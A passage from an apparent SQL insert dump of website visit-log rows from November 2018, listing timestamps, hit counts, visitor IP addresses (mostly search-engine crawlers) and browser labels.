541184669,2,2,0,0,'66.249.75.218','chrome'),(324275,1541184749,1,1,0,0,'54.36.149.103','other'),(324276,1541184789,1,1,0,0,'54.165.59.7','other'),(324277,1541184957,1,1,0,0,'54.36.148.234','other'),(324278,1541184966,1,1,0,0,'66.249.75.220','chrome'),(324279,1541184968,1,1,0,0,'54.36.149.85','other'),(324280,1541185110,1,1,0,0,'54.36.149.86','other'),(324281,1541185817,1,1,0,0,'54.36.148.48','other'),(324282,1541185952,3,3,0,0,'66.249.75.218','chrome'),(324283,1541186109,1,1,0,0,'66.249.75.199','chrome'),(324284,1541186110,1,1,0,0,'66.249.75.222','chrome'),(324285,1541186170,1,1,0,0,'54.36.149.8','other'),(324286,1541186222,2,2,0,0,'66.249.75.195','chrome'),(324287,1541186274,1,1,0,0,'54.36.148.220','other'),(324288,1541186331,2,2,0,0,'216.244.66.241','other'),(324289,1541186650,1,1,0,0,'54.36.148.20','other'),(324290,1541186714,1,1,0,0,'54.36.148.251','other'),(324291,1541186729,1,1,0,0,'54.36.148.96','other'),(324292,1541186778,1,1,0,0,'93.124.45.250','chrome'),(324293,1541187027,1,1,0,0,'54.36.148.72','other'),(324294,1541187059,1,1,0,0,'91.196.178.62','chrome'),(324295,1541187142,1,1,0,0,'54.36.148.14','other'),(324296,1541187447,2,2,0,0,'66.249.75.220','chrome'),(324297,1541187515,1,1,0,0,'66.249.75.218','chrome'),(324298,1541187535,1,1,0,0,'54.36.148.120','other'),(324299,1541188097,1,1,0,0,'66.249.75.13','chrome'),(324300,1541188183,1,1,0,0,'54.36.148.124','other'),(324301,1541188229,1,1,0,0,'157.55.39.197','other'),(324302,1541188335,1,1,0,0,'54.36.148.212','other'),(324303,1541188824,41,41,0,0,'66.249.75.218','chrome'),(324304,1541188923,1,1,0,0,'54.36.148.121','other'),(324305,1541188939,1,1,0,0,'54.36.149.12','other'),(324306,1541189220,1,1,0,0,'54.36.148.213','other'),(324307,1541189265,9,9,0,0,'66.249.75.220','chrome'),(324308,1541189268,2,2,0,0,'66.249.75.195','chrome'),(324309,1541189396,1,1,0,0,'91.196.178.176','chrome'),(324310,1541189585,2,2,0,0,'3.120.175.93','other'),(324311,1541189594,3,3,0,0,'66.249.75.199','chrome'),(324312,1541189715,5,5,0,0,'66.249.75.222','chrome'),(324313,1541189723,1,1,0,0,'54.36.148.228','other'),(324314,1541189735,6,6,0,0,'66.249.75.218','chrome'),(324315,1541190249,2,2,0,0,'66.249.75.13','chrome'),(324316,1541190272,1,1,0,0,'207.46.13.117','other'),(324317,1541190386,1,1,0,0,'66.249.75.195','chrome'),(324318,1541190499,1,1,0,0,'66.249.75.220','chrome'),(324319,1541191253,1,1,0,0,'54.36.148.50','other'),(324320,1541191310,1,1,0,0,'46.229.168.151','other'),(324321,1541191313,1,1,0,0,'46.229.168.129','other'),(324322,1541191542,1,1,0,0,'66.249.75.222','chrome'),(324323,1541191708,1,1,0,0,'40.77.167.99','other'),(324324,1541191737,1,1,0,0,'66.249.75.15','chrome'),(324325,1541191829,1,1,0,0,'66.249.75.13','chrome'),(324326,1541191880,1,1,0,0,'54.36.149.78','other'),(324327,1541191894,1,1,0,0,'66.249.75.201','chrome'),(324328,1541191895,2,2,0,0,'66.249.75.218','chrome'),(324329,1541192071,1,1,0,0,'66.249.75.195','chrome'),(324330,1541192329,1,1,0,0,'54.36.148.88','other'),(324331,1541192512,1,1,0,0,'82.145.208.142','other'),(324332,1541192628,1,1,0,0,'54.36.149.91','other'),(324333,1541192685,1,1,0,0,'94.41.205.187','chrome'),(324334,1541192694,1,1,0,0,'8.29.198.26','other'),(324335,1541193119,1,1,0,0,'157.55.39.197','other'),(324336,1541193252,1,1,0,0,'54.36.148.33','other'),(324337,1541193359,1,1,0,0,'54.36.148.250','other'),(324338,1541193410,3,3,0,0,'66.249.75.222','chrome'),(324339,1541193527,5,5,0,0,'66.249.75.220','chrome'),(324340,1541193535,24,24,0,0,'66.249.75.218','chrome'),(324341,1541193596,1,1,0,0,'66.249.75.15','chrome'),(324342,1541193710,2,2,0,0,'66.249.75.13','chrome'),(324343,1541194140,2,2,0,0,'8.29.198.26','other'),(324344,1541194487,1,1,0,0,'54.36.149.92','other'),(324345,1541194524,1,1,0,0,'54.36.148.247','other'),(324346,1541194674,1,1,0,0,'54.36.149.51','other'),(324347,1541194945,1,1,0,0,'54.36.148.23','other'),(324348,1541195015,1,1,0,0,'54.36.148.211','other'),(324349,1541195143,1,1,0,0,'54.36.148.193','other'),(324350,1541195351,2,2,0,0,'207.46.13.216','other'),(324351,1541195414,1,1,0,0,'66.249.75.220','chrome'),(324352,1541195433,1,1,0,0,'46.229.168.137','other'),(324353,1541195436,1,1,0,0,'46.229.168.141','other'),(324354,1541195703,3,3,0,0,'66.249.75.218','chrome'),(324355,1541195858,1,1,0,0,'46.229.168.154','other'),(324356,1541195913,1,1,0,0,'207.46.13.117','other'),(324357,1541195960,1,1,0,0,'54.36.148.54','other'),(324358,1541196199,1,1,0,0,'66.249.75.222','chrome'),(324359,1541196453,1,1,0,0,'54.36.148.135','other'),(324360,1541196503,12,12,0,0,'178.154.244.11','other'),(324361,1541196558,13,13,0,0,'178.154.244.29','other'),(324362,1541196598,9,9,0,0,'5.45.207.79','other'),(324363,1541196656,1,1,0,0,'46.229.168.130','other'),(324364,1541197253,1,1,0,0,'54.36.148.104','other'),(324365,1541197411,13,13,0,0,'178.154.244.11','other'),(324366,1541197463,15,15,0,0,'178.154.244.29','other'),(324367,1541197474,1,1,0,0,'5.45.207.19','other'),(324368,1541197530,1,1,0,0,'54.36.148.121','other'),(324369,1541197631,2,2,0,0,'66.249.75.218','chrome'),(324370,1541197723,26,26,0,0,'95.216.41.162','other'),(324371,1541197820,4,4,0,0,'5.45.207.79','other'),(324372,1541197911,1,1,0,0,'5.45.207.8','other'),(324373,1541197925,2,2,0,0,'216.244.66.241','other'),(324374,1541198258,1,1,0,0,'46.229.168.135','other'),(324375,1541198259,1,1,0,0,'46.229.168.148','other'),(324376,1541198281,1,1,0,0,'46.229.168.130','other'),(324377,1541198304,1,1,0,0,'141.8.142.103','other'),(324378,1541198409,1,1,0,0,'54.36.149.12','other'),(324379,1541198410,1,1,0,0,'66.249.75.15','chrome'),(324380,1541198441,1,1,0,0,'66.249.75.13','chrome'),(324381,1541198501,3,3,0,0,'178.154.244.29','other'),(324382,1541198634,2,2,0,0,'78.111.185.86','chrome'),(324383,1541198703,1,1,0,0,'66.249.75.222','chrome'),(324384,1541198929,3,3,0,0,'66.249.75.220','chrome'),(324385,1541199053,1,1,0,0,'54.36.148.92','other'),(324386,1541199509,1,1,0,0,'66.249.75.199','chrome'),(324387,1541199550,1,1,0,0,'66.249.75.15','chrome'),(324388,1541199614,1,1,0,0,'66.249.75.16','chrome'),(324389,1541199615,1,1,0,0,'54.36.148.172','other'),(324390,1541199674,1,1,0,0,'207.46.13.117','other'),(324391,1541199678,1,1,0,0,'157.55.39.197','other'),(324392,1541199839,2,2,0,0,'66.249.75.222','chrome'),(324393,1541199850,1,1,0,0,'66.249.75.30','chrome'),(324394,1541199851,1,1,0,0,'66.249.75.13','chrome'),(324395,1541199892,1,1,0,0,'54.36.148.144','other'),(324396,1541199989,1,1,0,0,'66.249.75.195','chrome'),(324397,1541200200,3,3,0,0,'216.244.66.241','other'),(324398,1541200631,1,1,0,0,'180.76.15.13','other'),(324399,1541200632,1,1,0,0,'180.76.15.28','other'),(324400,1541201051,6,6,0,0,'66.249.75.218','chrome'),(324401,1541201095,3,3,0,0,'66.249.75.220','chrome'),(324402,1541201415,2,2,0,0,'46.229.168.148','other'),(324403,1541201445,1,1,0,0,'95.163.255.98','other'),(324404,1541201448,1,1,0,0,'95.163.255.94','other'),(324405,1541201548,1,1,0,0,'54.36.148.113','other'),(324406,1541201582,1,1,0,0,'46.229.168.130','other'),(324407,1541202656,2,2,0,0,'95.163.255.92','other'),(324408,1541202738,1,1,0,0,'46.229.168.148','other'),(324409,1541202740,1,1,0,0,'46.229.168.133','other'),(324410,1541202760,1,1,0,0,'66.249.75.222','chrome'),(324411,1541202914,1,1,0,0,'62.205.134.182','other'),(324412,1541203320,1,1,0,0,'54.36.148.195','other'),(324413,1541203538,1,1,0,0,'8.29.198.27','other'),(324414,1541204288,1,1,0,0,'157.55.39.197','other'),(324415,1541205005,2,2,0,0,'8.29.198.25','other'),(324416,1541205064,2,2,0,0,'216.244.66.241','other'),(324417,1541205107,1,1,0,0,'54.36.148.245','other'),(324418,1541205446,1,1,0,0,'54.36.148.37','other'),(324419,1541205490,1,1,0,0,'66.249.75.201','chrome'),(324420,1541205491,1,1,0,0,'66.249.75.222','chrome'),(324421,1541205553,1,1,0,0,'46.229.168.146','other'),(324422,1541205554,1,1,0,0,'46.229.168.130','other'),(324423,1541205960,1,1,0,0,'54.36.148.217','other'),(324424,1541206016,1,1,0,0,'54.36.149.39','other'),(324425,1541206279,1,1,0,0,'54.36.148.162','other'),(324426,1541206389,2,2,0,0,'66.249.75.218','chrome'),(324427,1541206558,1,1,0,0,'66.249.75.222','chrome'),(324428,1541207024,1,1,0,0,'54.36.148.220','other'),(324429,1541207053,4,4,0,0,'216.244.66.241','other'),(324430,1541207211,1,1,0,0,'66.249.75.201','chrome'),(324431,1541207212,1,1,0,0,'66.249.75.220','chrome'),(324432,1541207779,1,1,0,0,'54.36.149.10','other'),(324433,1541207890,1,1,0,0,'54.36.148.91','other'),(324434,1541208225,1,1,0,0,'95.163.255.92','other'),(324435,1541208229,1,1,0,0,'95.163.255.94','other'),(324436,1541208651,1,1,0,0,'66.249.75.13','chrome'),(324437,1541208668,1,1,0,0,'54.36.148.138','other'),(324438,1541208906,1,1,0,0,'54.36.148.169','other'),(324439,1541208929,1,1,0,0,'54.36.148.191','other'),(324440,1541209081,1,1,0,0,'37.115.191.132','chrome'),(324441,1541209581,1,1,0,0,'54.36.148.206','other'),(324442,1541209765,1,1,0,0,'54.36.149.57','other'),(324443,1541209825,1,1,0,0,'46.229.168.150','other'),(324444,1541209827,1,1,0,0,'46.229.168.154','other'),(324445,1541209920,2,2,0,0,'66.249.75.218','chrome'),(324446,1541210227,1,1,0,0,'66.249.75.195','chrome'),(324447,1541210228,2,2,0,0,'66.249.75.222','chrome'),(324448,1541210284,1,1,0,0,'54.36.149.49','other'),(324449,1541210609,1,1,0,0,'54.36.148.64','other'),(324450,1541210704,1,1,0,0,'46.229.168.139','other'),(324451,1541210831,1,1,0,0,'54.36.149.73','other'),(324452,1541210945,1,1,0,0,'54.36.148.100','other'),(324453,1541211733,4,4,0,0,'216.244.66.241','other'),(324454,1541212172,7,7,0,0,'66.249.75.220','chrome'),(324455,1541212196,30,30,0,0,'66.249.75.218','chrome'),(324456,1541212377,1,1,0,0,'66.249.75.195','chrome'),(324457,1541212386,1,1,0,0,'54.36.148.194','other'),(324458,1541212502,1,1,0,0,'66.249.75.16','chrome'),(324459,1541212509,1,1,0,0,'66.249.75.13','chrome'),(324460,1541212681,1,1,0,0,'54.36.148.67','other'),(324461,1541212801,2,2,0,0,'95.163.255.118','other'),(324462,1541212807,3,3,0,0,'95.163.255.104','other'),(324463,1541212813,1,1,0,0,'95.163.255.102','other'),(324464,1541212825,3,3,0,0,'95.163.255.105','other'),(324465,1541212833,3,3,0,0,'95.163.255.108','other'),(324466,1541212846,1,1,0,0,'95.163.255.112','other'),(324467,1541212847,1,1,0,0,'54.36.148.212','other'),(324468,1541212852,2,2,0,0,'95.163.255.114','other'),(324469,1541212889,2,2,0,0,'95.163.255.113','other'),(324470,1541212905,1,1,0,0,'95.163.255.107','other'),(324471,1541212938,1,1,0,0,'95.163.255.116','other'),(324472,1541212963,1,1,0,0,'95.163.255.103','other'),(324473,1541212972,1,1,0,0,'95.163.255.109','other'),(324474,1541213453,1,1,0,0,'216.244.66.241','other'),(324475,1541213539,1,1,0,0,'54.36.149.12','other'),(324476,1541213643,1,1,0,0,'46.229.168.149','other'),(324477,1541213699,1,1,0,0,'66.249.75.195','chrome'),(324478,1541213705,1,1,0,0,'66.249.75.218','chrome'),(324479,1541213826,1,1,0,0,'54.36.148.113','other'),(324480,1541213829,1,1,0,0,'40.77.167.99','other'),(324481,1541213859,1,1,0,0,'54.36.148.10','other'),(324482,1541213867,1,1,0,0,'95.163.255.96','other'),(324483,1541213870,1,1,0,0,'95.163.255.93','other'),(324484,1541213901,1,1,0,0,'54.36.148.175','other'),(324485,1541214040,24,24,0,0,'178.154.244.29','other'),(324486,1541214282,13,13,0,0,'178.154.244.11','other'),(324487,1541214383,1,1,0,0,'8.29.198.27','other'),(324488,1541214477,1,1,0,0,'54.36.148.170','other'),(324489,1541214553,1,1,0,0,'5.45.207.79','other'),(324490,1541214601,1,1,0,0,'54.36.148.58','other'),(324491,1541214857,1,1,0,0,'66.249.75.16','chrome'),(324492,1541215038,1,1,0,0,'54.36.148.82','other'),(324493,1541215098,6,6,0,0,'178.154.244.29','other'),(324494,1541215202,1,1,0,0,'5.45.207.19','other'),(324495,1541215203,2,2,0,0,'46.229.168.142','other'),(324496,1541215205,1,1,0,0,'46.229.168.147','other'),(324497,1541215263,1,1,0,0,'46.229.168.153','other'),(324498,1541215312,4,4,0,0,'216.244.66.241','other'),(324499,1541215324,11,11,0,0,'66.249.75.220','chrome'),(324500,1541215357,29,29,0,0,'66.249.75.218','chrome'),(324501,1541215441,1,1,0,0,'66.249.75.222','chrome'),(324502,1541215531,2,2,0,0,'37.9.113.20','other'),(324503,1541215624,3,3,0,0,'178.154.244.11','other'),(324504,1541215813,1,1,0,0,'54.36.148.187','other'),(324505,1541215840,1,1,0,0,'5.188.210.51','chrome'),(324506,1541215868,1,1,0,0,'8.29.198.25','other'),(324507,1541216086,1,1,0,0,'54.36.148.135','other'),(324508,1541216124,1,1,0,0,'87.250.224.47','other'),(324509,1541216158,1,1,0,0,'8.29.198.26','other'),(324510,1541216192,1,1,0,0,'66.249.75.199','chrome'),(324511,1541216220,1,1,0,0,'193.106.30.98','firefox'),(324512,1541216257,2,2,0,0,'178.154.244.29','other'),(324513,1541216312,7,7,0,0,'34.221.126.207','chrome'),(324514,1541216444,1,1,0,0,'54.36.149.23','other'),(324515,1541216460,1,1,0,0,'5.45.207.19','other'),(324516,1541216547,1,1,0,0,'54.36.148.141','other'),(324517,1541216554,1,1,0,0,'54.36.148.91','other'),(324518,1541216668,1,1,0,0,'54.36.148.117','other'),(324519,1541216861,6,6,0,0,'40.77.167.99','other'),(324520,1541217180,5,5,0,0,'207.46.13.216','other'),(324521,1541217185,3,3,0,0,'157.55.39.197','other'),(324522,1541217191,5,5,0,0,'207.46.13.117','other'),(324523,1541217290,19,19,0,0,'40.77.167.206','other'),(324524,1541217327,2,2,0,0,'66.249.75.218','chrome'),(324525,1541217391,1,1,0,0,'62.205.134.182','msie'),(324526,1541217431,1,1,0,0,'66.102.9.134','chrome'),(324527,1541217437,1,1,0,0,'46.211.104.163','chrome'),(324528,1541217473,1,1,0,0,'54.36.148.238','other'),(324529,1541217557,1,1,0,0,'46.229.168.132','other'),(324530,1541217559,1,1,0,0,'46.229.168.149','other'),(324531,1541217611,7,7,0,0,'207.46.13.231','other'),(324532,1541217617,20,20,0,0,'40.77.167.209','other'),(324533,1541217991,2,2,0,0,'216.244.66.241','other'),(324534,1541218086,11,11,0,0,'207.46.13.243','other'),(324535,1541218426,1,1,0,0,'66.249.75.195','chrome'),(324536,1541218532,1,1,0,0,'66.249.75.218','chrome'),(324537,1541219188,1,1,0,0,'80.90.55.169','other'),(324538,1541219536,1,1,0,0,'66.249.75.199','chrome'),(324539,1541219537,1,1,0,0,'66.249.75.220','chrome'),(324540,1541219583,1,1,0,0,'54.36.148.111','other'),(324541,1541219628,1,1,0,0,'54.36.148.102','other'),(324542,1541219652,1,1,0,0,'66.249.75.30','chrome'),(324543,1541219656,1,1,0,0,'66.249.75.16','chrome'),(324544,1541219766,1,1,0,0,'54.36.149.57','other'),(324545,1541220076,1,1,0,0,'54.36.148.84','other'),(324546,1541220296,1,1,0,0,'54.36.149.81','other'),(324547,1541220362,3,3,0,0,'66.249.75.218','chrome'),(324548,1541220397,1,1,0,0,'54.36.148.192','other'),(324549,1541220454,1,1,0,0,'46.229.168.144','other'),(324550,1541220455,1,1,0,0,'46.229.168.149','other'),(324551,1541220529,3,3,0,0,'216.244.66.241','other'),(324552,1541220575,1,1,0,0,'66.249.75.220','chrome'),(324553,1541220707,1,1,0,0,'66.249.75.16','chrome'),(324554,1541220843,1,1,0,0,'54.36.148.179','other'),(324555,1541220970,2,2,0,0,'95.213.141.126','opera'),(324556,1541220998,1,1,0,0,'54.36.148.197','other'),(324557,1541221082,1,1,0,0,'66.249.75.199','chrome'),(324558,1541221117,1,1,0,0,'54.36.148.37','other'),(324559,1541221392,1,1,0,0,'54.36.149.19','other'),(324560,1541222031,1,1,0,0,'54.36.149.56','other'),(324561,1541222132,1,1,0,0,'54.36.148.59','other'),(324562,1541222358,44,44,0,0,'66.249.75.218','chrome'),(324563,1541222362,3,3,0,0,'66.249.75.220','chrome'),(324564,1541222367,1,1,0,0,'54.36.148.72','other'),(324565,1541222462,4,4,0,0,'66.249.75.222','chrome'),(324566,1541222546,2,2,0,0,'66.249.75.195','chrome'),(324567,1541222746,1,1,0,0,'54.36.148.86','other'),(324568,1541222902,1,1,0,0,'54.36.148.220','other'),(324569,1541223102,3,3,0,0,'216.244.66.241','other'),(324570,1541223307,2,2,0,0,'128.69.160.92','chrome'),(324571,1541223341,4,4,0,0,'66.249.75.218','chrome'),(324572,1541223836,1,1,0,0,'54.36.149.88','other'),(324573,1541224192,2,2,0,0,'66.249.75.220','chrome'),(324574,1541224292,1,1,0,0,'13.57.233.99','chrome'),(324575,1541224300,1,1,0,0,'66.249.75.195','chrome'),(324576,1541224392,1,1,0,0,'54.36.149.25','other'),(324577,1541224504,1,1,0,0,'54.36.148.52','other'),(324578,1541225022,2,2,0,0,'95.163.255.92','other'),(324579,1541225224,1,1,0,0,'8.29.198.26','other'),(324580,1541225232,4,4,0,0,'216.244.66.241','other'),(324581,1541225453,1,1,0,0,'54.36.148.91','other'),(324582,1541225585,1,1,0,0,'54.36.149.98','other'),(324583,1541225743,1,1,0,0,'54.36.148.204','other'),(324584,1541225795,1,1,0,0,'207.46.13.216','other'),(324585,1541225812,1,1,0,0,'54.36.149.40','other'),(324586,1541226149,1,1,0,0,'80.90.55.173','other'),(324587,1541226422,2,2,0,0,'216.244.66.241','other'),(324588,1541226448,1,1,0,0,'66.249.75.195','chrome'),(324589,1541226449,1,1,0,0,'66.249.75.222','chrome'),(324590,1541226720,1,1,0,0,'8.29.198.25','other'),(324591,1541226809,1,1,0,0,'66.249.69.158','chrome'),(324592,1541226810,1,1,0,0,'66.249.69.142','chrome'),(324593,1541226811,1,1,0,0,'54.36.148.117','other'),(324594,1541226893,1,1,0,0,'54.36.149.0','other'),(324595,1541227016,1,1,0,0,'8.29.198.27','other'),(324596,1541227068,1,1,0,0,'54.36.148.194','other'),(324597,1541227772,9,9,0,0,'66.249.75.220','chrome'),(324598,1541227785,7,6,1,0,'66.249.75.195',''),(324599,1541227786,65,64,1,0,'66.249.75.218',''),(324600,1541227800,3,3,0,0,'66.249.75.222','chrome'),(324601,1541228404,2,2,0,0,'46.211.132.140','chrome'),(324602,1541228534,57,57,0,0,'66.249.75.218','chrome'),(324603,1541228686,3,3,0,0,'66.249.75.195','chrome'),(324604,1541228703,4,4,0,0,'66.249.75.220','chrome'),(324605,1541228830,1,1,0,0,'54.36.148.229','other'),(324606,1541228836,1,1,0,0,'178.154.244.29','other'),(324607,1541228875,1,1,0,0,'54.36.148.169','other'),(324608,1541229050,1,0,1,0,'66.249.69.140',''),(324609,1541229102,1,1,0,0,'54.36.148.20','other'),(324610,1541229449,1,1,0,0,'66.249.69.142','chrome'),(324611,1541229558,2,2,0,0,'52.53.201.78','chrome'),(324612,1541229633,1,1,0,0,'54.36.148.171','other'),(324613,1541229667,1,1,0,0,'54.36.149.32','other'),(324614,1541229694,1,1,0,0,'66.249.75.199','chrome'),(324615,1541229695,4,4,0,0,'66.249.75.222','chrome'),(324616,1541229743,18,18,0,0,'66.249.75.218','chrome'),(324617,1541229967,2,2,0,0,'66.249.75.195','chrome'),(324618,1541230072,1,1,0,0,'54.36.149.15','other'),(324619,1541230337,1,1,0,0,'66.249.73.92','chrome'),(324620,1541230561,6,6,0,0,'66.249.75.220','chrome'),(324621,1541230584,1,1,0,0,'54.36.148.64','other'),(324622,1541230624,1,1,0,0,'54.36.148.119','other'),(324623,1541230633,5,5,0,0,'66.249.75.222','chrome'),(324624,1541230645,12,12,0,0,'66.249.75.218','chrome'),(324625,1541230647,3,3,0,0,'216.244.66.241','other'),(324626,1541231292,1,1,0,0,'54.36.148.185','other'),(324627,1541231569,5,5,0,0,'66.249.75.220','chrome'),(324628,1541231681,21,21,0,0,'66.249.75.218','chrome'),(324629,1541231748,1,1,0,0,'66.249.75.195','chrome'),(324630,1541231788,2,2,0,0,'66.249.75.222','chrome'),(324631,1541231889,10,10,0,0,'178.154.244.29','other'),(324632,1541231906,7,7,0,0,'178.154.244.11','other'),(324633,1541232022,1,1,0,0,'5.45.207.79','other'),(324634,1541232037,1,1,0,0,'54.36.148.61','other'),(324635,1541232422,1,1,0,0,'54.36.149.4','other'),(324636,1541232750,1,1,0,0,'66.249.69.158','chrome'),(324637,1541232751,1,1,0,0,'66.249.69.140','chrome'),(324638,1541232760,1,1,0,0,'54.36.148.188','other'),(324639,1541233009,1,1,0,0,'54.36.148.80','other'),(324640,1541233069,2,2,0,0,'66.249.75.220','chrome'),(324641,1541233149,2,2,0,0,'66.249.75.195','chrome'),(324642,1541233150,3,3,0,0,'66.249.75.218','chrome'),(324643,1541233172,2,2,0,0,'66.249.75.199','chrome'),(324644,1541233193,1,1,0,0,'216.244.66.241','other'),(324646,1541233236,1,1,0,0,'54.36.149.34','other'),(324647,1541233826,1,1,0,0,'54.36.148.236','other'),(324648,1541233948,1,1,0,0,'54.36.149.35','other'),(324649,1541234209,2,2,0,0,'66.249.75.222','chrome'),(324650,1541234221,1,1,0,0,'216.244.66.241','other'),(324651,1541234326,1,1,0,0,'66.249.69.140','chrome'),(324652,1541234764,3,3,0,0,'66.249.75.220','chrome'),(324653,1541235040,1,1,0,0,'54.36.149.11','other'),(324654,1541235095,1,1,0,0,'66.249.69.144','chrome'),(324655,1541235213,1,1,0,0,'46.229.168.154','other'),(324656,1541235768,1,1,0,0,'54.36.148.174','other'),(324657,1541235952,2,2,0,0,'66.249.75.220','chrome'),(324658,1541236024,2,2,0,0,'95.163.255.92','other'),(324659,1541236026,2,2,0,0,'95.163.255.99','other'),(324660,1541236057,1,1,0,0,'8.29.198.26','other'),(324661,1541236059,1,1,0,0,'66.249.75.201','chrome'),(324662,1541236060,1,1,0,0,'66.249.75.222','chrome'),(324663,1541236182,1,1,0,0,'222.186.20.54','msie'),(324664,1541236363,1,1,0,0,'66.249.75.218','chrome'),(324665,1541236793,1,1,0,0,'54.36.148.217','other'),(324666,1541236828,1,1,0,0,'66.249.75.195','chrome'),(324667,1541237287,3,3,0,0,'66.249.75.220','chrome'),(324668,1541237569,2,2,0,0,'8.29.198.27','other'),(324669,1541237725,1,1,0,0,'66.249.75.218','chrome'),(324670,1541237868,1,1,0,0,'95.163.255.93','other'),(324671,1541237877,1,1,0,0,'95.163.255.98','other'),(324672,1541238451,1,1,0,0,'207.46.13.216','other'),(324673,1541238579,1,1,0,0,'157.55.39.197','other'),(324674,1541238633,3,3,0,0,'216.244.66.241','other'),(324675,1541238730,1,1,0,0,'66.249.75.220','chrome'),(324676,1541238738,1,1,0,0,'66.249.75.218','chrome'),(324677,1541238831,1,1,0,0,'46.229.168.145','other'),(324678,1541238834,1,1,0,0,'46.229.168.148','other'),(324679,1541239025,1,1,0,0,'54.36.148.66','other'),(324680,1541239628,1,1,0,0,'128.69.160.92','msie'),(324681,1541239671,3,3,0,0,'40.77.167.99','other'),(324682,1541239675,1,1,0,0,'157.55.39.197','other'),(324683,1541239680,1,1,0,0,'207.46.13.216','other'),(324684,1541239686,6,6,0,0,'207.46.13.117','other'),(324685,1541240382,1,1,0,0,'54.36.148.239','other'),(324686,1541240387,1,1,0,0,'188.230.43.254','other'),(324687,1541240510,2,2,0,0,'66.249.75.218','chrome'),(324688,1541240692,1,1,0,0,'66.249.75.222','chrome'),(324689,1541240980,1,1,0,0,'66.249.75.195','chrome'),(324690,1541241221,1,1,0,0,'54.36.148.50','other'),(324691,1541241260,1,1,0,0,'66.249.69.156','chrome'),(324692,1541241261,1,1,0,0,'66.249.69.142','chrome'),(324693,1541241550,1,1,0,0,'54.36.148.12','other'),(324694,1541241613,1,1,0,0,'216.244.66.241','other'),(324695,1541241961,1,1,0,0,'54.36.149.67','other'),(324696,1541242152,1,0,1,0,'66.249.69.158',''),(324697,1541242622,1,1,0,0,'46.229.168.154','other'),(324698,1541242623,1,1,0,0,'46.229.168.151','other'),(324699,1541242635,1,1,0,0,'180.76.15.150','other'),(324700,1541242750,1,1,0,0,'66.249.69.144','chrome'),(324701,1541242825,1,1,0,0,'188.230.43.254','other'),(324702,1541242911,4,4,0,0,'66.249.69.142','chrome'),(324703,1541242964,2,2,0,0,'46.211.26.5','chrome'),(324704,1541243132,4,4,0,0,'66.249.69.140','chrome'),(324705,1541243187,1,1,0,0,'54.36.148.119','other'),(324706,1541243196,1,1,0,0,'54.36.148.158','other'),(324707,1541243500,3,3,0,0,'216.244.66.241','other'),(324708,1541244324,1,1,0,0,'46.229.168.144','other'),(324709,1541244616,1,1,0,0,'54.36.148.194','other'),(324710,1541244934,2,2,0,0,'66.249.75.15','chrome'),(324711,1541244959,1,1,0,0,'66.249.75.13','chrome'),(324712,1541245027,1,1,0,0,'54.36.149.51','other'),(324713,1541245064,1,1,0,0,'207.46.13.216','other'),(324714,1541245111,2,2,0,0,'157.55.39.197','other'),(324715,1541245192,1,1,0,0,'188.230.43.254','other'),(324716,1541245223,3,3,0,0,'40.77.167.99','other'),(324717,1541245380,1,1,0,0,'207.46.13.117','other'),(324718,1541245633,1,1,0,0,'66.249.75.199','chrome'),(324719,1541245634,1,1,0,0,'66.249.75.222','chrome'),(324720,1541245680,1,1,0,0,'40.77.167.189','other'),(324721,1541245681,2,2,0,0,'66.249.75.218','chrome'),(324722,1541245730,1,1,0,0,'216.244.66.241','other'),(324723,1541246006,1,1,0,0,'54.36.149.84','other'),(324724,1541246101,1,1,0,0,'207.46.13.216','other'),(324725,1541246170,1,1,0,0,'40.77.167.99','other'),(324726,1541246330,1,1,0,0,'54.36.149.93','other'),(324727,1541246332,1,1,0,0,'54.36.148.139','other'),(324728,1541246664,1,1,0,0,'157.55.39.197','other'),(324729,1541246891,1,1,0,0,'8.29.198.27','other'),(324730,1541246923,1,1,0,0,'54.36.148.231','other'),(324731,1541247306,1,1,0,0,'54.36.149.28','other'),(324732,1541247423,1,1,0,0,'54.36.149.35','other'),(324733,1541247506,1,1,0,0,'54.36.148.123','other'),(324734,1541247605,1,1,0,0,'188.230.43.254','other'),(324735,1541247620,12,12,0,0,'66.249.75.218','chrome'),(324736,1541247663,4,4,0,0,'66.249.75.220','chrome'),(324737,1541247722,1,1,0,0,'54.36.148.60','other'),(324738,1541247791,1,1,0,0,'54.36.149.22','other'),(324739,1541247796,1,1,0,0,'157.55.39.197','other'),(324740,1541247854,1,1,0,0,'207.46.13.117','other'),(324741,1541248016,1,1,0,0,'66.249.75.15','chrome'),(324742,1541248425,1,1,0,0,'8.29.198.27','other'),(324743,1541248430,1,1,0,0,'54.36.148.143','other'),(324744,1541248530,2,2,0,0,'46.229.168.137','other'),(324745,1541248696,1,1,0,0,'8.29.198.25','other'),(324746,1541248827,19,19,0,0,'178.154.244.29','other'),(324747,1541248961,7,7,0,0,'178.154.244.11','other'),(324748,1541249264,2,2,0,0,'216.244.66.241','other'),(324749,1541249283,1,1,0,0,'87.250.224.47','other'),(324750,1541249294,4,4,0,0,'5.45.207.79','other'),(324751,1541249348,3,3,0,0,'5.45.207.19','other'),(324752,1541249383,1,1,0,0,'66.249.75.199','chrome'),(324753,1541249384,10,10,0,0,'66.249.75.218','chrome'),(324754,1541249545,2,2,0,0,'66.249.75.222','chrome'),(324755,1541249718,1,1,0,0,'66.249.75.30','chrome'),(324756,1541249719,3,3,0,0,'66.249.75.13','chrome'),(324757,1541249764,2,2,0,0,'46.211.121.183','chrome'),(324758,1541249883,6,6,0,0,'178.154.244.29','other'),(324759,1541250203,2,2,0,0,'5.45.207.79','other'),(324760,1541250204,1,1,0,0,'54.36.148.92','other'),(324761,1541250247,2,2,0,0,'178.154.244.11','other'),(324762,1541250296,6,6,0,0,'66.249.75.15','chrome'),(324763,1541250305,1,1,0,0,'54.36.149.5','other'),(324764,1541250370,1,1,0,0,'54.36.148.19','other'),(324765,1541250398,1,1,0,0,'54.36.149.93','other'),(324766,1541250490,40,40,0,0,'5.9.155.37','other'),(324767,1541250570,1,1,0,0,'54.36.148.248','other'),(324768,1541250583,1,1,0,0,'54.36.148.234','other'),(324769,1541250612,1,1,0,0,'46.229.168.153','other'),(324770,1541250625,1,1,0,0,'54.36.148.99','other'),(324771,1541250662,1,1,0,0,'66.249.75.16','chrome'),(324772,1541250687,2,2,0,0,'66.249.75.13','chrome'),(324773,1541250735,17,17,0,0,'148.251.244.137','other'),(324774,1541251175,1,1,0,0,'66.249.75.201','chrome'),(324775,1541251462,1,1,0,0,'91.196.178.174','other'),(324776,1541251467,1,1,0,0,'54.36.149.8','other'),(324777,1541251799,1,1,0,0,'54.36.149.26','other'),(324778,1541252066,1,1,0,0,'54.36.148.103','other'),(324779,1541252329,1,1,0,0,'54.36.149.81','other'),(324780,1541252727,2,2,0,0,'66.